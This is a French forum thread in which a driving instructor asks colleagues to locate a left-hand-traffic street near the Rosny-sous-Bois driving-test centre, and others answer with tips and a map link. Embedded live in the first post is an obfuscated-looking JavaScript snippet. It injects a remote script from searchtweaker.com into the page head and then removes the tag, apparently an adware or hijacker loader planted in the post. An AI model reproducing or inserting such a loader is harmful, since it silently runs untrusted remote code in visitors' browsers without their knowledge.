Galères de moniteur auto-école

Rejoignez le forum, c’est rapide et facile

Galères de moniteur auto-école
Galères de moniteur auto-école
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.
Aller en bas
avatar
djam'z
Nouveau
Nouveau
Messages : 8
Date d'inscription : 20/10/2013
Age : 36
Localisation : 95

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Centre d examen Rosny sous bois.. besoin de votre aide!

Mer 16 Juil - 7:29
Bonjour chers collegues,

j ai changé de département il y a quelque temps ( je me retrouve dans le 93) et je suis pas encore tout à fait calé sur Rosny sous bois.

J y tourne regulierement pour repérer rapidement les zones de travail et les "petits" pieges.

Mais y a un detail qui me rend fou, un jour je suis passé par hasard dans une rue ou la circulation se fait à gauche. Arreté au feu rouge, on tourne à gauche mais il ne faut surtout pas prendre trop large au risque de tomber dans le sens interdit (en l'occurence la voie de droite). Jusque la rien de bien compliqué... sauf que je ne retrouve plus cette rue  Laughing 

sa parait bete, j'ai tourné tourné et encore tourné mais j'arrive plus à remettre la main dessus donc avis aux monos qui tournent dans le coin, pouvez-vous me situer cette fameuse rue. Je sais plus du tout si c'est vers le centre ville ou autre.

Je tiens vraiment à y emmener mes eleves avant leur examen afin de les preparer au max, je suis sur qu'ils tomberaient tous dans le panneau si ils ne sont pas rodés!! Et je m'en voudrais à mort  pale 

1000 mercis pour votre aide!  bounce 

(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
MARIELLEDEPARIS
MARIELLEDEPARIS
Membre gold
Membre gold
Messages : 591
Date d'inscription : 08/12/2012
Localisation : la capitale

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Re: Centre d examen Rosny sous bois.. besoin de votre aide!

Jeu 17 Juil - 6:34
Ca me rappelle quelque chose.... mais comme je ne suis pas sûre...
A moins que l'ambiance ne soit plus là....tu t'arrêtes demander à un collègue au point de départ (de l'autre côté du parking de Rosny2), ou tu passes voir une autre AE, ou même par téléphone, si quelqu'un se souvient du nom de la rue.
windierstar
windierstar
Membre gold
Membre gold
Messages : 708
Date d'inscription : 24/01/2012
Age : 46
Localisation : Landerneau

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Re: Centre d examen Rosny sous bois.. besoin de votre aide!

Ven 18 Juil - 6:15
Ça m'arrive de rechercher un endroit croisé en examen que je ne retrouve plus...

Ma solution : google maps en Streetview , c'est assez efficace.
avatar
theone
Contributeur
Contributeur
Messages : 39
Date d'inscription : 23/06/2014

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Re: Centre d examen Rosny sous bois.. besoin de votre aide!

Ven 18 Juil - 6:57
à mon avis tu parle de cette rue https://www.google.fr/maps/@48.863467,2.491972,3a,75y,152.26h,64.75t/data=!3m4!1e1!3m2!1sTggQQUuomnghFtF0u51fBw!2e0?hl=fr

lol ....j'y suis passé pour la première il y a moins d'une semaine
peut-être que je me trompe mais sinon il y a aussi une rue sur noisy le sec il me semble où l'on circule à gauche avec une voie de bus sur la droite .


Dernière édition par theone le Ven 18 Juil - 13:24, édité 1 fois
avatar
theone
Contributeur
Contributeur
Messages : 39
Date d'inscription : 23/06/2014

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Re: Centre d examen Rosny sous bois.. besoin de votre aide!

Ven 18 Juil - 7:04
MARIELLEDEPARIS
MARIELLEDEPARIS
Membre gold
Membre gold
Messages : 591
Date d'inscription : 08/12/2012
Localisation : la capitale

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Re: Centre d examen Rosny sous bois.. besoin de votre aide!

Ven 18 Juil - 7:48
Trop fort (e?) Théone!
avatar
theone
Contributeur
Contributeur
Messages : 39
Date d'inscription : 23/06/2014

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Re: Centre d examen Rosny sous bois.. besoin de votre aide!

Ven 18 Juil - 13:21
normal c'est mon secteur  Cool 
IL est trop FORT theone (ze one)...ok je redescend
MARIELLEDEPARIS
MARIELLEDEPARIS
Membre gold
Membre gold
Messages : 591
Date d'inscription : 08/12/2012
Localisation : la capitale

 Centre d examen Rosny sous bois.. besoin de votre aide! Empty Re: Centre d examen Rosny sous bois.. besoin de votre aide!

Ven 18 Juil - 13:57
Ben oui....The One....
"Théone".....ha cette Marielle!!!!
Je tenterais bien un "il faut chaud, je suis fatiguée"; mais je vais être honnête: je suis à la ramasse!

N'empêche que:
-tu prends le temps de répondre
-tu nous montres même le cas IRL
alors.....chapeau bas!
Revenir en haut
Permission de ce forum:
Vous ne pouvez pas répondre aux sujets dans ce forum